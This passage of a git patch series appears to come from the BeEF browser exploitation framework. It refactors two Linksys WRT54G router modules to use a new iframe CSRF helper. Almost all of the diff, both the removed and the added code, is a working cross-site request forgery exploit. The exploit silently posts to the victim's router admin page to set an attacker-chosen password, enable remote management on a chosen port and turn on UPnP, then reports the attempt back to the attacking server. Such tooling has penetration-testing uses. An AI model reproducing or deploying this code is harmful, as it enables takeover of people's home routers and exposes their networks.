wrt54g2_iframe.contentWindow.document.body.appendChild(form); - form.submit(); + var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST", + [{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} , + {'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'}, + {'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'}, + {'type':'hidden', 'name':'MANAGE_PASSWORDMOD', 'value':'1'}, + {'type':'hidden', 'name':'MANAGE_PASSWORD', 'value':passwd}, + {'type':'hidden', 'name':'MANAGE_PASSWORD_CONFIRM', 'value':passwd}, + {'type':'hidden', 'name':'_http_enable', 'value':'1'}, + {'type':'hidden', 'name':'MANAGE_WLFILTER', 'value':'1'}, + {'type':'hidden', 'name':'MANAGE_REMOTE', 'value':'1'}, + {'type':'hidden', 'name':'MANAGE_PORT', 'value':port}, + {'type':'hidden', 'name':'MANAGE_UPNP', 'value':'1'}, + {'type':'hidden', 'name':'layout', 'value':'en'} + ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); From 46a19ee0b9921704d4b7d7c47c549fdf42344ac8 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 9 May 2012 14:39:18 +0100 Subject: [PATCH 21/21] Updated lynksys_wrt54g_xsrf (second one) to use the new beef.dom.createIframeXsrfForm JS api --- modules/router/linksys_wrt54g_csrf/command.js | 98 +++---------------- 1 file changed, 14 insertions(+), 84 deletions(-) diff --git a/modules/router/linksys_wrt54g_csrf/command.js b/modules/router/linksys_wrt54g_csrf/command.js index 456922d35..d18e65898 100644 --- a/modules/router/linksys_wrt54g_csrf/command.js +++ b/modules/router/linksys_wrt54g_csrf/command.js @@ -18,90 +18,20 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; - var target = gateway + "manage.tri"; - - var wrt54g_iframe = beef.dom.createInvisibleIframe(); - - var form = document.createElement('form'); - form.setAttribute('action', target); - form.setAttribute('method', 'post'); - - var input = null; - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'remote_mgt_https'); - input.setAttribute('value', 0); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'http_enable'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'https_enable'); - input.setAttribute('value', 0); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'PasswdModify'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'http_passwd'); - input.setAttribute('value', passwd); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'http_passwdConfirm'); - input.setAttribute('value', passwd); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', '_http_enable'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'web_wl_filter'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'remote_management'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'http_wanport'); - input.setAttribute('value', port); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'upnp_enable'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'layout'); - input.setAttribute('value', 'en'); - form.appendChild(input); - - wrt54g_iframe.contentWindow.document.body.appendChild(form); - form.submit(); + var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST", + [{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} , + {'type':'hidden', 'name':'http_enable', 'value':'1'}, + {'type':'hidden', 'name':'https_enable', 'value':'0'}, + {'type':'hidden', 'name':'PasswdModify', 'value':'1'}, + {'type':'hidden', 'name':'http_passwd', 'value':passwd}, + {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd}, + {'type':'hidden', 'name':'_http_enable', 'value':'1'}, + {'type':'hidden', 'name':'remote_management', 'value':'1'}, + {'type':'hidden', 'name':'web_wl_filter', 'value':'1'}, + {'type':'hidden', 'name':'http_wanport', 'value':port}, + {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, + {'type':'hidden', 'name':'layout', 'value':'en'} + ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");